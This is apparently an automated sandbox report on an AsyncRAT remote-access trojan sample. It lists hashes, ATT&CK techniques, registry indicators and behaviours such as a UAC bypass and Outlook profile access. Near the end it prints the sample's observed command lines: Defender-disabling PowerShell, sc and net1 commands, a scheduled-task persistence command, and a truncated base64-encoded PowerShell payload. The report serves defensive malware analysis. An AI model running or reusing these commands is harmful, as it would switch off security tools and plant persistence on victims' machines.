asyncrat | 4672ceafd2e11ff9aa26ecbb9094aed5d1a58e995f2a93ae054f46f6f56591f7

General

Target

0ee108a8e3b9cddad2cceb2648072fe2.exe
Size

415KB
MD5

0ee108a8e3b9cddad2cceb2648072fe2
SHA1

fce82d4a7aefd76ed3239fb6f33bbd7b6dce87a9
SHA256

4672ceafd2e11ff9aa26ecbb9094aed5d1a58e995f2a93ae054f46f6f56591f7
SHA512

1456febc7903ffa5c018b8c3a2ebd05278cddb9a39f792615f9dd308ef95a542fd89ebe31a709d4d36d335f9e96fbe410fc6990e4e3f9c2f4308d9e508124449
SSDEEP

12288:mF4ioOyjRGILz+N8vmI/v8GpRyWgDy6QG:2ZoOyjMqLN+W9G

Score

10^/10

asyncrat collection evasion rat spyware stealer trojan

Malware Config

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Modifies Windows Defender Real-time Protection settings 3 TTPs 1 IoCs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection powershell.exe
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3584 created 656 3584 powershell.exe lsass.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	powershell.exe

description	pid	process	target process
PID 3584 created 656	3584	powershell.exe	lsass.exe

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

svchost.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0"	svchost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0"	svchost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0"	svchost.exe

Executes dropped EXE 1 IoCs

Processes:

svchost.exe

pid process

2312 svchost.exe

pid	process
2312	svchost.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

0ee108a8e3b9cddad2cceb2648072fe2.exesvchost.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	0ee108a8e3b9cddad2cceb2648072fe2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	svchost.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

svchost.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	svchost.exe
Key opened	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	svchost.exe
Key opened	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	svchost.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

svchost.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua	svchost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0"	svchost.exe

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

73 ip-api.com
71 icanhazip.com
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exe

pid process

3124 sc.exe
4004 sc.exe
3744 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3364 2312 WerFault.exe svchost.exe

flow	ioc
73	ip-api.com
71	icanhazip.com

pid	process
3124	sc.exe
4004	sc.exe
3744	sc.exe

pid	pid_target	process	target process
3364	2312	WerFault.exe	svchost.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

svchost.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	svchost.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

208 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4608 timeout.exe

pid	process
208	schtasks.exe

pid	process
4608	timeout.exe

Modifies data under HKEY_USERS 46 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

0ee108a8e3b9cddad2cceb2648072fe2.exesvchost.exe

pid	process
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
2312	svchost.exe
2312	svchost.exe
2312	svchost.exe
2312	svchost.exe
2312	svchost.exe
2312	svchost.exe
2312	svchost.exe
2312	svchost.exe
2312	svchost.exe
2312	svchost.exe
2312	svchost.exe
2312	svchost.exe
2312	svchost.exe
2312	svchost.exe
2312	svchost.exe
2312	svchost.exe
2312	svchost.exe
2312	svchost.exe
2312	svchost.exe
2312	svchost.exe
2312	svchost.exe

Suspicious use of AdjustPrivilegeToken 40 IoCs

Processes:

0ee108a8e3b9cddad2cceb2648072fe2.exesvchost.exepowershell.exewhoami.exepowershell.exewhoami.exe

description	pid	process
Token: SeDebugPrivilege	2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
Token: SeDebugPrivilege	2136	0ee108a8e3b9cddad2cceb2648072fe2.exe
Token: SeDebugPrivilege	2312	svchost.exe
Token: SeDebugPrivilege	2312	svchost.exe
Token: SeDebugPrivilege	3584	powershell.exe
Token: SeDebugPrivilege	2392	whoami.exe
Token: SeDebugPrivilege	2392	whoami.exe
Token: SeDebugPrivilege	2392	whoami.exe
Token: SeDebugPrivilege	2392	whoami.exe
Token: SeDebugPrivilege	2392	whoami.exe
Token: SeDebugPrivilege	2392	whoami.exe
Token: SeDebugPrivilege	2392	whoami.exe
Token: SeDebugPrivilege	2392	whoami.exe
Token: SeDebugPrivilege	2392	whoami.exe
Token: SeDebugPrivilege	2392	whoami.exe
Token: SeDebugPrivilege	2392	whoami.exe
Token: SeDebugPrivilege	2392	whoami.exe
Token: SeDebugPrivilege	2392	whoami.exe
Token: SeDebugPrivilege	2392	whoami.exe
Token: SeDebugPrivilege	2392	whoami.exe
Token: SeDebugPrivilege	2392	whoami.exe
Token: SeDebugPrivilege	2392	whoami.exe
Token: SeDebugPrivilege	2392	whoami.exe
Token: SeDebugPrivilege	2392	whoami.exe
Token: SeDebugPrivilege	2392	whoami.exe
Token: SeDebugPrivilege	2392	whoami.exe
Token: SeDebugPrivilege	2392	whoami.exe
Token: SeDebugPrivilege	2392	whoami.exe
Token: SeDebugPrivilege	2392	whoami.exe
Token: SeDebugPrivilege	2392	whoami.exe
Token: SeDebugPrivilege	2392	whoami.exe
Token: SeDebugPrivilege	3188	powershell.exe
Token: SeDebugPrivilege	4436	whoami.exe
Token: SeDebugPrivilege	4436	whoami.exe
Token: SeDebugPrivilege	4436	whoami.exe
Token: SeDebugPrivilege	4436	whoami.exe
Token: SeDebugPrivilege	4436	whoami.exe
Token: SeDebugPrivilege	4436	whoami.exe
Token: SeDebugPrivilege	4436	whoami.exe
Token: SeDebugPrivilege	4436	whoami.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

svchost.exe

pid process

2312 svchost.exe

pid	process
2312	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

0ee108a8e3b9cddad2cceb2648072fe2.execmd.execmd.exesvchost.exepowershell.exepowershell.execmd.exe

description	pid	process	target process
PID 2136 wrote to memory of 3476	2136	0ee108a8e3b9cddad2cceb2648072fe2.exe	cmd.exe
PID 2136 wrote to memory of 3476	2136	0ee108a8e3b9cddad2cceb2648072fe2.exe	cmd.exe
PID 2136 wrote to memory of 3476	2136	0ee108a8e3b9cddad2cceb2648072fe2.exe	cmd.exe
PID 2136 wrote to memory of 5036	2136	0ee108a8e3b9cddad2cceb2648072fe2.exe	cmd.exe
PID 2136 wrote to memory of 5036	2136	0ee108a8e3b9cddad2cceb2648072fe2.exe	cmd.exe
PID 2136 wrote to memory of 5036	2136	0ee108a8e3b9cddad2cceb2648072fe2.exe	cmd.exe
PID 3476 wrote to memory of 208	3476	cmd.exe	schtasks.exe
PID 3476 wrote to memory of 208	3476	cmd.exe	schtasks.exe
PID 3476 wrote to memory of 208	3476	cmd.exe	schtasks.exe
PID 5036 wrote to memory of 4608	5036	cmd.exe	timeout.exe
PID 5036 wrote to memory of 4608	5036	cmd.exe	timeout.exe
PID 5036 wrote to memory of 4608	5036	cmd.exe	timeout.exe
PID 5036 wrote to memory of 2312	5036	cmd.exe	svchost.exe
PID 5036 wrote to memory of 2312	5036	cmd.exe	svchost.exe
PID 5036 wrote to memory of 2312	5036	cmd.exe	svchost.exe
PID 2312 wrote to memory of 3584	2312	svchost.exe	powershell.exe
PID 2312 wrote to memory of 3584	2312	svchost.exe	powershell.exe
PID 2312 wrote to memory of 3584	2312	svchost.exe	powershell.exe
PID 3584 wrote to memory of 3124	3584	powershell.exe	sc.exe
PID 3584 wrote to memory of 3124	3584	powershell.exe	sc.exe
PID 3584 wrote to memory of 3124	3584	powershell.exe	sc.exe
PID 3584 wrote to memory of 3456	3584	powershell.exe	cmd.exe
PID 3584 wrote to memory of 3456	3584	powershell.exe	cmd.exe
PID 3584 wrote to memory of 3456	3584	powershell.exe	cmd.exe
PID 3584 wrote to memory of 2392	3584	powershell.exe	whoami.exe
PID 3584 wrote to memory of 2392	3584	powershell.exe	whoami.exe
PID 3584 wrote to memory of 2392	3584	powershell.exe	whoami.exe
PID 3584 wrote to memory of 1776	3584	powershell.exe	net1.exe
PID 3584 wrote to memory of 1776	3584	powershell.exe	net1.exe
PID 3584 wrote to memory of 1776	3584	powershell.exe	net1.exe
PID 3584 wrote to memory of 4048	3584	powershell.exe	net1.exe
PID 3584 wrote to memory of 4048	3584	powershell.exe	net1.exe
PID 3584 wrote to memory of 4048	3584	powershell.exe	net1.exe
PID 3584 wrote to memory of 3188	3584	powershell.exe	powershell.exe
PID 3584 wrote to memory of 3188	3584	powershell.exe	powershell.exe
PID 3584 wrote to memory of 3188	3584	powershell.exe	powershell.exe
PID 3188 wrote to memory of 4004	3188	powershell.exe	sc.exe
PID 3188 wrote to memory of 4004	3188	powershell.exe	sc.exe
PID 3188 wrote to memory of 4004	3188	powershell.exe	sc.exe
PID 3188 wrote to memory of 968	3188	powershell.exe	cmd.exe
PID 3188 wrote to memory of 968	3188	powershell.exe	cmd.exe
PID 3188 wrote to memory of 968	3188	powershell.exe	cmd.exe
PID 3188 wrote to memory of 4436	3188	powershell.exe	whoami.exe
PID 3188 wrote to memory of 4436	3188	powershell.exe	whoami.exe
PID 3188 wrote to memory of 4436	3188	powershell.exe	whoami.exe
PID 3188 wrote to memory of 3496	3188	powershell.exe	net1.exe
PID 3188 wrote to memory of 3496	3188	powershell.exe	net1.exe
PID 3188 wrote to memory of 3496	3188	powershell.exe	net1.exe
PID 3188 wrote to memory of 3744	3188	powershell.exe	sc.exe
PID 3188 wrote to memory of 3744	3188	powershell.exe	sc.exe
PID 3188 wrote to memory of 3744	3188	powershell.exe	sc.exe
PID 2312 wrote to memory of 2924	2312	svchost.exe	cmd.exe
PID 2312 wrote to memory of 2924	2312	svchost.exe	cmd.exe
PID 2312 wrote to memory of 2924	2312	svchost.exe	cmd.exe
PID 2924 wrote to memory of 2192	2924	cmd.exe	chcp.com
PID 2924 wrote to memory of 2192	2924	cmd.exe	chcp.com
PID 2924 wrote to memory of 2192	2924	cmd.exe	chcp.com
PID 2924 wrote to memory of 3144	2924	cmd.exe	netsh.exe
PID 2924 wrote to memory of 3144	2924	cmd.exe	netsh.exe
PID 2924 wrote to memory of 3144	2924	cmd.exe	netsh.exe
PID 2924 wrote to memory of 1576	2924	cmd.exe	findstr.exe
PID 2924 wrote to memory of 1576	2924	cmd.exe	findstr.exe
PID 2924 wrote to memory of 1576	2924	cmd.exe	findstr.exe
PID 2312 wrote to memory of 2308	2312	svchost.exe	cmd.exe

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

Processes:

svchost.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0"	svchost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0"	svchost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0"	svchost.exe

outlook_office_path 1 IoCs

Processes:

svchost.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	svchost.exe

outlook_win_path 1 IoCs

Processes:

svchost.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	svchost.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:656

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
2⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3188

C:\Windows\SysWOW64\sc.exe
"C:\Windows\system32\sc.exe" qc windefend
3⤵
- Launches sc.exe
PID:4004

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
3⤵
PID:968

C:\Windows\SysWOW64\whoami.exe
"C:\Windows\system32\whoami.exe" /groups
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4436

C:\Windows\SysWOW64\net1.exe
"C:\Windows\system32\net1.exe" stop windefend
3⤵
PID:3496

C:\Windows\SysWOW64\sc.exe
"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
3⤵
- Launches sc.exe
PID:3744

C:\Users\Admin\AppData\Local\Temp\0ee108a8e3b9cddad2cceb2648072fe2.exe
"C:\Users\Admin\AppData\Local\Temp\0ee108a8e3b9cddad2cceb2648072fe2.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2136

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Roaming\svchost.exe"' & exit
2⤵
- Suspicious use of WriteProcessMemory
PID:3476

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Roaming\svchost.exe"'
3⤵
- Creates scheduled task(s)
PID:208

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB3A5.tmp.bat""
2⤵
- Suspicious use of WriteProcessMemory
PID:5036

C:\Windows\SysWOW64\timeout.exe
timeout 3
3⤵
- Delays execution with timeout.exe
PID:4608

C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
3⤵
- UAC bypass
- Executes dropped EXE
- Checks computer location settings
- Accesses Microsoft Outlook profiles
- Checks whether UAC is enabled
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
- outlook_office_path
- outlook_win_path
PID:2312

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgB